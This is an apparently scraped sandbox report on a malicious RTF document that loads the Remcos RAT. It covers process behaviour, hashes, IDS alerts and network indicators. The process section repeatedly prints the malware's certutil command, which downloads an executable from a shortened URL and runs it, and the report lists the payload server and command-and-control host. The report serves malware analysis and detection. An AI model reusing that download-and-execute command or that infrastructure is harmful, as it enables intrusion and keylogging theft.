analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

edca004e9b509e2b4a57bfa508047be6.rtf

Full analysis: https://app.any.run/tasks/7f7e700b-d095-4661-b42b-cc2a487d62d3
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: May 24, 2019, 02:51:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
rat
remcos
keylogger
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

EDCA004E9B509E2B4A57BFA508047BE6

SHA1:

1B6354871834B7E012EEAFE9A2FF39857FADE615

SHA256:

17A9DBAC4E78F04F15C18F49C02086096669C2BF9D8741E246AE948D58E2A7BF

SSDEEP:

1536:VBsGuQET7rNGcpkF9+vJZAocdJhzXA2FqQm/rOX1QET7rNGcpkF9+vJZAocdJhz2:Vl7co+/co+/co+9U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 1184)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 1332)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 2896)
      • cmd.exe (PID: 3652)
      • cmd.exe (PID: 2188)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1184)
      • EXCEL.EXE (PID: 1332)
      • EXCEL.EXE (PID: 3928)
    • Application was dropped or rewritten from another process

      • 1dIEjM1m5S.pif (PID: 3216)
      • 1dIEjM1m5S.pif (PID: 4028)
      • 1dIEjM1m5S.pif (PID: 2944)
      • 1dIEjM1m5S.pif (PID: 2848)
      • 1dIEjM1m5S.pif (PID: 324)
      • 1dIEjM1m5S.pif (PID: 2592)
    • Downloads executable files from the Internet

      • certutil.exe (PID: 3664)
      • certutil.exe (PID: 588)
      • certutil.exe (PID: 2524)
    • Downloads executable files from IP

      • certutil.exe (PID: 3664)
      • certutil.exe (PID: 2524)
      • certutil.exe (PID: 588)
    • Uses Task Scheduler to run other applications

      • 1dIEjM1m5S.pif (PID: 3216)
      • 1dIEjM1m5S.pif (PID: 4028)
      • 1dIEjM1m5S.pif (PID: 2944)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2388)
      • schtasks.exe (PID: 3560)
      • schtasks.exe (PID: 3648)
    • Detected logs from REMCOS RAT

      • 1dIEjM1m5S.pif (PID: 2848)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 1332)
      • EXCEL.EXE (PID: 1184)
      • EXCEL.EXE (PID: 3928)
      • excelcnv.exe (PID: 2236)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2896)
      • cmd.exe (PID: 3652)
      • cmd.exe (PID: 2188)
      • 1dIEjM1m5S.pif (PID: 3216)
      • 1dIEjM1m5S.pif (PID: 4028)
      • 1dIEjM1m5S.pif (PID: 2944)
    • Executable content was dropped or overwritten

      • certutil.exe (PID: 3664)
      • certutil.exe (PID: 588)
      • certutil.exe (PID: 2524)
      • 1dIEjM1m5S.pif (PID: 3216)
    • Creates files in the user directory

      • certutil.exe (PID: 3664)
      • 1dIEjM1m5S.pif (PID: 3216)
      • 1dIEjM1m5S.pif (PID: 2848)
    • Application launched itself

      • 1dIEjM1m5S.pif (PID: 3216)
      • 1dIEjM1m5S.pif (PID: 4028)
      • 1dIEjM1m5S.pif (PID: 2944)
    • Writes files like Keylogger logs

      • 1dIEjM1m5S.pif (PID: 2848)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1184)
      • EXCEL.EXE (PID: 1332)
      • WINWORD.EXE (PID: 1892)
      • EXCEL.EXE (PID: 3928)
      • excelcnv.exe (PID: 2236)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 85
CharactersWithSpaces: 460
Characters: 393
Words: 68
Pages: 5
TotalEditTime: 1 minute
RevisionNumber: 2
ModifyDate: 2019:02:12 18:12:00
CreateDate: 2019:02:12 18:12:00
LastModifiedBy: Windows User
Author: Windows User
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
20
Malicious processes
11
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs 1diejm1m5s.pif cmd.exe no specs certutil.exe excelcnv.exe no specs 1diejm1m5s.pif no specs 1diejm1m5s.pif no specs schtasks.exe no specs #REMCOS 1diejm1m5s.pif schtasks.exe no specs 1diejm1m5s.pif no specs schtasks.exe no specs 1diejm1m5s.pif no specs

Process information

PID
CMD
Path
Indicators
Parent process
1892"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\edca004e9b509e2b4a57bfa508047be6.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1184"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2896cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pifC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3664certutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pifC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1332"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3652cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pifC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
588certutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pifC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942432
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3928"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
32161dIEjM1m5S.pifC:\Users\admin\Documents\1dIEjM1m5S.pif
cmd.exe
User:
admin
Company:
MS Outlook
Integrity Level:
MEDIUM
Description:
MS Outlook
Exit code:
0
Version:
12.5.6.4
2188cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pifC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 452
Read events
1 741
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
3
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR40A6.tmp.cvr
MD5:
SHA256:
1184EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR47DA.tmp.cvr
MD5:
SHA256:
1332EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4ECF.tmp.cvr
MD5:
SHA256:
3928EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR521B.tmp.cvr
MD5:
SHA256:
2236excelcnv.exeC:\Users\admin\AppData\Local\Temp\CVR5670.tmp.cvr
MD5:
SHA256:
2236excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DFFFEDC90892DDD080.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF5DC3B2E19947F6E9.TMP
MD5:
SHA256:
2236excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DF1DF047DB998DEF41.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF04FA17C33CA392CB.TMP
MD5:
SHA256:
2236excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DF8231B23349C7D3B3.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
23
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3664
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
3664
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2HNzkyt
US
html
120 b
shared
3664
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2HNzkyt
US
html
120 b
shared
588
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2HNzkyt
US
html
120 b
shared
588
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
2524
certutil.exe
GET
301
67.199.248.10:80
http://bit.ly/2HNzkyt
US
html
120 b
shared
588
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
2524
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
3664
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
2524
certutil.exe
GET
200
185.141.27.219:80
http://185.141.27.219/outlook.jpg
NL
executable
195 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
588
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
2524
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
3664
certutil.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
3664
certutil.exe
185.141.27.219:80
Host Sailor Ltd.
NL
malicious
2524
certutil.exe
185.141.27.219:80
Host Sailor Ltd.
NL
malicious
588
certutil.exe
185.141.27.219:80
Host Sailor Ltd.
NL
malicious
2848
1dIEjM1m5S.pif
173.254.223.87:7070
heyyou.mywire.org
QuadraNet, Inc
US
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
heyyou.mywire.org
  • 173.254.223.87
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3664
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3664
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] PE as Image Content type mismatch
3664
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3664
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3664
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] PE as Image Content type mismatch
3664
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
588
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
588
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] PE as Image Content type mismatch
588
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
588
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
12 ETPRO signatures available at the full report
No debug info